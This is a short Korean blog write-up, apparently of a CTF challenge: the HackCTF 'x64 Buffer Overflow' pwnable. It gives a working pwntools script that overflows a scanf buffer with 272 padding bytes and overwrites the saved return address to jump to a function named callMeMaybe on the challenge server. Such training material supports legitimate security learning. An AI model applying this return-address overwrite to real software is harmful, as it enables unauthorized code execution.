WAR GAME/HackCTF

[HackCTF : Pwnable] x64 Buffer Overflow 풀이 (64bit, BOF)

jir4vvit 2021. 3. 5. 18:53

문제 풀이 환경 : ubuntu 16.04
사용 툴 : IDA 7.5 pro

 

Analysis

대놓고 scanf에서 BOF가 터진다.

 

How to exploit

payload = dummy + SFP + RET

 

RET를 callMeMaybe 함수로 덮는다!

 

Let's exploit

from pwn import *

#p = process('64bof_basic')
p = remote('ctf.j0n9hyun.xyz', 3004)
e = ELF('./64bof_basic')

callMeMaybe = 0x400606

payload = ''
payload += 'A' * 272 
payload += 'BBBBBBBB' # SFP
payload += p64(callMeMaybe) # RET

p.sendline(payload)

p.interactive()

 

 

이런건 이제 (매우 과장해서) 1분컷 할 수 있다.